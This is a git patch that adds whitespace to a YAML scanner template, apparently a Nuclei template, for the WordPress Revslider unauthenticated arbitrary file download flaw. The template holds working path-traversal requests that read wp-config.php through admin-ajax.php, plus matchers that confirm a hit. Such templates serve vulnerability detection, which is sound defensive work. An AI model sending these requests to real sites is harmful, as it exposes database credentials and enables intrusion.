From a8ee7e2ddf95191bf9a64fb203247876444be2fd Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 22 Nov 2021 20:29:59 +0530 Subject: [PATCH] Update wp-revslider-file-download.yaml --- vulnerabilities/wp-revslider-file-download.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/wp-revslider-file-download.yaml b/vulnerabilities/wp-revslider-file-download.yaml index a9511bfb8b..123db8de3a 100644 --- a/vulnerabilities/wp-revslider-file-download.yaml +++ b/vulnerabilities/wp-revslider-file-download.yaml @@ -1,4 +1,6 @@ id: wp-revslider-file-download + + info: name: Wordpress Revslider - Unauthenticated Arbitrary File Download author: pussycat0x @@ -10,11 +12,15 @@ info: - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html - https://cxsecurity.com/issue/WLB-2021090129 tags: wordpress,wp-plugin,lfi + + requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' + + matchers-condition: and matchers: - type: word @@ -25,4 +31,4 @@ requests: condition: and - type: status status: - - 200 \ No newline at end of file + - 200